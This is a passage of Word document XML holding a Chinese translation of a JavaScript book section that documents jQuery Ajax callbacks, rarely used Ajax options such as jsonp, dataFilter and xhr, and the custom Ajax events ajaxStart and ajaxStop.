        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档或</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>对象不符合格式，则状态码为</w:t>
      </w:r>
      <w:r>
        <w:t>"parsererror"</w:t>
      </w:r>
      <w:r>
        <w:t>。在这种情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>回调的第三个参数是抛出的</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象。注意</w:t>
      </w:r>
      <w:r>
        <w:t>dataType</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>的请求在返回无效</w:t>
      </w:r>
      <w:r>
        <w:t>JavaSc</w:t>
      </w:r>
      <w:r>
        <w:t>ript</w:t>
      </w:r>
      <w:r>
        <w:t>代码时不会触发错误。脚本中的任何错误都会直接忽略，调用的回调则是</w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>complete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该选项指定</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求完成时激活的回调函数。每一个</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求或者成功时调用</w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:t>回调，或者失败时调用</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>回调。在调用</w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会调用</w:t>
      </w:r>
      <w:r>
        <w:t>complete</w:t>
      </w:r>
      <w:r>
        <w:t>回调。传给</w:t>
      </w:r>
      <w:r>
        <w:t>complete</w:t>
      </w:r>
      <w:r>
        <w:t>回调的第一个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，第二个参数则是状态码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>不常用的选项和钩子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>下述</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>选项不经常使用。某些特定选项通常不可能设置，另一些选项</w:t>
      </w:r>
      <w:r>
        <w:t>则提供了自定义钩子，使得可以修改</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求的默认处理方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>async</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>脚本化的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求本身就是异步的。然而，</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象提供了一个选项，可用来阻塞当前进程，直到接收到响应。如果想开启这一阻塞行为，可以设置该选项为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。设置该选项不会更改</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值：如果有使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的话，该函数会始终返回该对象。对于同步请求，可以自己从</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象中提取服务器的响应和</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>状态码，如果想要获取</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>解析</w:t>
      </w:r>
      <w:r>
        <w:t>的响应和状态码，可以指定一个</w:t>
      </w:r>
      <w:r>
        <w:t>complete</w:t>
      </w:r>
      <w:r>
        <w:t>回调（就和给异步请求指定的一样）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>dataFilter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该选项指定一个函数，用来过滤或预处理服务器返回的数据。第一个参数是从服务器返回的原始数据（字符串或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>请求返回的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象），第二个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>dataType</w:t>
      </w:r>
      <w:r>
        <w:t>选项的值。如果指定该函数，则它必须返回一个值，该值会用来替换掉服务器的响应。注意</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>dataFilter()</w:t>
      </w:r>
      <w:r>
        <w:t>函数会在</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>解析和脚本执行前执行。同时注意对于跨域的</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"jsonp"</w:t>
      </w:r>
      <w:r>
        <w:t>请求不会调用</w:t>
      </w:r>
      <w:r>
        <w:t>dataFilter()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jsonp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当设置</w:t>
      </w:r>
      <w:r>
        <w:t>dataType</w:t>
      </w:r>
      <w:r>
        <w:t>选项为</w:t>
      </w:r>
      <w:r>
        <w:t>"jsonp"</w:t>
      </w:r>
      <w:r>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>选项通常会包含一个类似</w:t>
      </w:r>
      <w:r>
        <w:t>"jsonp=?"</w:t>
      </w:r>
      <w:r>
        <w:t>的参数。如果</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>选项中没有找到类似参数时，会使用该选项指定的名字插入一个。该选项的默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>"callback"</w:t>
      </w:r>
      <w:r>
        <w:t>。在使用</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>时，如果服务器需要一个不同的参数名，而</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>选项中又没有指定时，需要设置该选项。请查看</w:t>
      </w:r>
      <w:r>
        <w:t>18.2</w:t>
      </w:r>
      <w:r>
        <w:t>节获取</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>的更多细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jsonpCallback</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>dataType</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"jsonp"</w:t>
      </w:r>
      <w:r>
        <w:t>的请求（或</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中带有类似</w:t>
      </w:r>
      <w:r>
        <w:t>"jsonp=?"</w:t>
      </w:r>
      <w:r>
        <w:t>这种</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>参数的</w:t>
      </w:r>
      <w:r>
        <w:t>"json"</w:t>
      </w:r>
      <w:r>
        <w:t>请求），</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>必须将</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>“?”</w:t>
      </w:r>
      <w:r>
        <w:t>替换成包装函数名，服务器会将数据传递给该包装函数。通常，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会根据当前时间来生成一个唯一的函数名。如果想用自己的函数来替代</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>生成的，则可以设置该选项。但是，一旦这样做了，会阻止</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>在触发正常事件时调用</w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>complete</w:t>
      </w:r>
      <w:r>
        <w:t>回调。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>processData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当设置</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>选项为对象（或将对象作为第二个参数传递给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>和相关方法）时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>通常会将该对象转换成字符串，该字符串遵守标准的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML"</w:t>
      </w:r>
      <w:r>
        <w:t>application/x-www-form-urlencoded"</w:t>
      </w:r>
      <w:r>
        <w:t>格式（参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>"2.jQuery.getJSON()"</w:t>
      </w:r>
      <w:r>
        <w:t>节）。如果想省略掉该步骤（比如想将</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象作为</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求体发送），请设置该选项为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>scriptCharset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于跨域的</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"jsonp"</w:t>
      </w:r>
      <w:r>
        <w:t>请求，会使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，该选项用来指定＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>charset</w:t>
      </w:r>
      <w:r>
        <w:t>属性值。该选项对正常的基于</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的请求不会有任何作用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>tranditional</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQue</w:t>
      </w:r>
      <w:r>
        <w:t>ry 1.4</w:t>
      </w:r>
      <w:r>
        <w:t>改变了数据对象序列化为</w:t>
      </w:r>
      <w:r>
        <w:t>"application/x-www-form-urlencoded"</w:t>
      </w:r>
      <w:r>
        <w:t>字符串的方式（细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>"2.jQuery.getJSON()"</w:t>
      </w:r>
      <w:r>
        <w:t>节）。设置该选项为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，可以让</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>回复到原来的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>username,password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果请求需要密码验证，请使用这两个选项来指定用户名和密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>xhr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该选项指定一个工厂函数，用来获取</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象。该工厂函数在调用时不带参数，而且必须返回一个实现了</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest API</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这个非常底层的钩子可以创建自己对</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的包装，可以给方法添加特性或测量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="495" w:name="19_6_4_AjaxShi_Jian_"/>
      <w:r>
        <w:t>19.6.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="495"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>19.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>“2.</w:t>
      </w:r>
      <w:r>
        <w:t>回调</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>节描述了</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>拥有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个回调选项：</w:t>
      </w:r>
      <w:r>
        <w:t>beforeSend</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>complete</w:t>
      </w:r>
      <w:r>
        <w:t>。除了分别激活这些指定的回调函数，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>函数还会在</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求的每一个相同阶段触发自定义事件。下面的表格展示了这些回调函数和相应的事件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4127739" cy="1337094"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="49" name="00049.jpeg" descr="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00049.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4127739" cy="1337094"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和上表第二列中的事件类型字符串来注册这些自定义</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>事件，也可以使用第三列中的事件注册方法来注册。</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxSuccess()</w:t>
      </w:r>
      <w:r>
        <w:t>和其他方法的使用方式就与</w:t>
      </w:r>
      <w:r>
        <w:t>click()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>19.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>节中的其他简单事件注册方法一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>事件是自定义事件，是由</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>而不是浏览器产生的，因此传递给事件处理程序的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象不是很有用。其实，</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxSend</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxSuccess</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxError</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxComplete</w:t>
      </w:r>
      <w:r>
        <w:t>事件在触发时都带有其他参数。这些事件的处理程序激活时在</w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>参数后都带有两个额外的参数。第一个额外参数是</w:t>
      </w:r>
      <w:r>
        <w:t>XM</w:t>
      </w:r>
      <w:r>
        <w:t>LHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，第二个额外参数是选项对象。例如，这意味着</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxSend</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序可以向</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象添加自定义头，就和</w:t>
      </w:r>
      <w:r>
        <w:t>beforeSend</w:t>
      </w:r>
      <w:r>
        <w:t>回调可以做的一样。除了上面描述的两个额外参数，触发</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxError</w:t>
      </w:r>
      <w:r>
        <w:t>事件时还会带有第三个额外参数。如果有的话，事件处理程序的第三个额外参数是</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象，是在发生错误时抛出的。令人奇怪的是，这些</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>事件并没有传入</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的状态码。例如，如果</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxSuccess</w:t>
      </w:r>
      <w:r>
        <w:t>事件的一个处理程序需要区分</w:t>
      </w:r>
      <w:r>
        <w:t>"success"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"notmodif</w:t>
      </w:r>
      <w:r>
        <w:t>ied"</w:t>
      </w:r>
      <w:r>
        <w:t>，则它需要从</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象中检查原始</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>状态码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面表格中列举的最后两个事件与其他事件不同，最明显的是它们没有相应的回调函数，同时它们在触发时不带额外参数。</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxStart</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxStop</w:t>
      </w:r>
      <w:r>
        <w:t>是一对表示与</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>相关的网络活动开始和停止的事件。当</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>没在执行任何</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求时，如果开始一个新请求，它就会触发</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxStart</w:t>
      </w:r>
      <w:r>
        <w:t>事件。如果在第一个请求还没完成时，其他请求就开始了，这些新请求不会触发新的</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxStart</w:t>
      </w:r>
      <w:r>
        <w:t>事件。当最后</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个挂起的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求完成并且</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>不再执行任何网络活动时，会触发</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxStop</w:t>
      </w:r>
      <w:r>
        <w:t>事件。这一对事件能很方便地用来显示</w:t>
      </w:r>
      <w:r>
        <w:t>和隐藏某些</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>加载中</w:t>
      </w:r>
      <w:r>
        <w:t>...”</w:t>
      </w:r>
      <w:r>
        <w:t>动画或网络活动的图标。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
